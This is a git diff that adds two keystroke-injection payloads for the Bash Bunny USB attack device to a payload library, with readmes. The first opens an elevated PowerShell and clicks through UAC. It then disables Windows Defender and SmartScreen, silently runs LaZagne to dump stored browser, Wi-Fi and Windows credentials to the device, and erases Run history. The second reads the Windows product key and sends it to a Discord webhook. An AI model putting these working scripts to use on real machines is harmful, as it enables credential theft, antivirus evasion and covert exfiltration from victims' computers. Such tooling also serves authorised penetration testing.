Merge 96feaedd48 into 9bc2a0312d

Added NoDefenseAgainstLaZagne payload to credentials lib on for Bash Bunny

payloads/library/credentials/NoDefenseAgainstLaZagne/payload.ps1

@@ -0,0 +1,6 @@
+$drivelabel = 'BashBunny'
+$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
+$filter = 'password_'+ $env:COMPUTERNAME
+$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
+Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

payloads/library/credentials/NoDefenseAgainstLaZagne/payload.txt

@@ -0,0 +1,90 @@
+#!/bin/bash
+#
+# Title:         Disable Windows Defender and Exfil stored passwords
+# Description:   Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... 
+#                This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. 
+#                This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
+# Author:        rafa-guillermo
+# Props:         Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
+# Version:       1.2
+# Category:      Credentials
+# Target:        Windows
+# Tested On:     Windows 11
+# Attackmodes:   HID, STORAGE
+
+# Options
+LOOTDIR=/root/udisk/loot/PasswordGrabber
+
+######## Set-up ########
+LED SETUP
+GET SWITCH_POSITION
+ATTACKMODE HID STORAGE
+DRIVE_LABEL=BashBunny
+
+######## Make Loot Dir ########
+# Setup named logs in loot directory
+mkdir -p $LOOTDIR
+
+####### Open a powershell window with elevated privileges #######
+LED STAGE1
+RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
+sleep 3 # wait for UAC prompt
+QUACK ALT y
+sleep 2
+
+# Disable Windows Defender File Scan and and Real Time Protection
+QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
+QUACK ENTER
+QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
+QUACK ENTER
+QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableScriptScanning \$true
+QUACK ENTER
+sleep 1
+
+# Run laZagne 
+LED STAGE2
+QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
+QUACK ENTER
+QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
+QUACK ENTER
+QUACK STRING \& \$scriptPath
+QUACK ENTER
+sleep 10
+QUACK STRING exit
+QUACK ENTER
+
+
+# Re-enable Defender and Smart screen
+LED CLEANUP
+RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
+sleep 3 # wait for UAC prompt
+QUACK ALT y
+sleep 2
+QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
+QUACK ENTER
+QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
+QUACK ENTER
+QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
+QUACK ENTER
+QUACK STRING Set-MpPreference -DisableScriptScanning \$false
+QUACK ENTER
+sleep 1
+QUACK STRING exit
+QUACK ENTER
+
+######## FINISH ########
+LED FINISH

payloads/library/credentials/NoDefenseAgainstLaZagne/readme.md

@@ -0,0 +1,39 @@
+# NoDefenseAgainstLaZagne
+
+* Author: [rafa-guillermo](https://github.com/rafa-guillermo)
+* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade, jdebetaz
+* Version: 1.0
+* Frimware support: 1.1 and higher
+* Target version: Windows 11
+* Tested on: Windows 11
+
+## Description
+Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
+
+Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
+Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/credentials/PasswordGrabber)
+
+## Configuration
+1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
+2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
+3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
+4. Plug your BashBunny and Enjoy
+
+
+## Info
+rafa-guillermo: I've added a whole bunch of stuff to disable Windows Defender file scanner, smart screen and RTP before running LaZagne, I was having issues where otherwise it would immediately be quarantined. Defender will be enabled again after execution.
+
+jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
+
+RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
+
+## Disclaimer
+__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
+
+## Led status
+
+| LED                                           | Status |
+|-----------------------------------------------|--------|
+| Magenta solid                                 | Setup  |
+| Yellow single blink                           | Attack |
+| Green 1000ms VERYFAST blink followed by SOLID | Finish |

payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md

@@ -0,0 +1,95 @@
+# Exfiltrate Windows Product Key
+
+Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook.
+
+No administrator permissions are required to do this, isn't that absurd, right? :-)
+
+![](https://i.ibb.co/m4QpT5v/1.png)
+
+**Category**: Exfiltration
+
+## Index
+
+- [Introduction](#exfiltrate-windows-product-key)
+- [Note](#note)
+- [Dependencies](#dependencies)
+- [Settings](#settings)
+- [Payload Description](#payload-description)
+- [Product Key Types](#product-key-types)
+- [Sources](#sources)
+
+## Note
+
+Tested on:
+- Windows 11
+
+## Dependencies
+
+- Discord Webhook
+
+## Settings
+
+- `QUACK REM VARIABLES:`: Introduces a section for variables in the code.
+- `QUACK REM Put here your Discord Webhook`: Indicates where the user should put their Discord webhook URL.
+
+This code snippet is useful for setting up a Discord webhook integration by defining the necessary variable to hold the webhook URL.
+
+```plaintext
+QUACK REM VARIABLES:
+QUACK REM Put here your Discord Webhook
+DISCORD-WEBHOOK="https://discord.com/api/webhooks/0123456789.../abcefg..."
+```
+
+
+## Payload Description
+
+Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself.
+
+The following commands are executed to obtain the necessary information about the Product Key:
+
+1. This command retrieves the currently in-use Product Key:
+
+   ```powershell
+   wmic path softwarelicensingservice get OA3xOriginalProductKey
+   ```
+
+2. This command helps determine the type of key. You can refer to the [key types section](#key-types) for more details:
+
+   ```powershell
+   wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription
+   ```
+
+The acquired information is stored in the `$exfiltration` variable, which is subsequently used to create the `$payload` object. This object is then utilized for exfiltration via a Discord Webhook.
+
+**Exfiltration**:
+
+```powershell
+Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
+```
+
+The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution.
+
+## Product Key Types
+
+When dealing with Windows Product Keys, it's essential to understand the different types and their characteristics:
+
+- **OEM Keys** (*Original Equipment Manufacturer*):
+
+      **Transferability**: Not supposed to be transferable. These keys are typically tied to the prebuilt PC on which they were originally installed.
+      **Usage**: Manufacturers use OEM keys to install Windows on new computers.
+      **Procurement**: OEM keys can sometimes be found at discount key vendors, although their use on different hardware may be challenging.
+
+- **Retail Keys** (*aka "Full Packaged Product" Keys*):
+      
+      **Transferability**: Transferrable. These keys can be moved from one computer to another.
+      **Cost**: Retail keys are often more expensive, often exceeding $100.
+      **Hidden Keys**: In some cases, a computer may already have a retail key, perhaps from a previous Windows upgrade. Users might not be aware of this until they check.
+
+Understanding these key types is crucial when working with Windows Product Keys, as it can impact their use, transferability, and compatibility with different hardware and scenarios.
+
+*Note: Source of this info [[2](#sources)]*
+
+## Sources
+
+- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3

payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt

@@ -0,0 +1,45 @@
+###################################################
+#                                                 #
+# Title        : Exfiltrate Windows Product Key   #
+# Author       : Aleff                            #
+# Version      : 1.0                              #
+# Category     : Exfiltration                     #
+# Target       : Windows 10-11                    #
+#                                                 #
+###################################################
+
+ATTACKMODE HID
+
+QUACK REM VARIABLES:
+QUACK REM Put here your Discord Webhook
+DISCORD-WEBHOOK='https://discord.com/api/webhooks/0123456789.../abcefg...'
+
+QUACK DELAY 3000
+QUACK GUI r
+QUACK DELAY 1000
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 2000
+QUACK STRING \$exfiltration = @\"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING \$(wmic path softwarelicensingservice get OA3xOriginalProductKey)
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING \$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription)
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING \"@
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING \$payload = [PSCustomObject]@{
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING content = \$exfiltration
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING }
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING Invoke-RestMethod -Uri $DISCORD-WEBHOOK -Method Post -Body (\$payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
+QUACK ENTER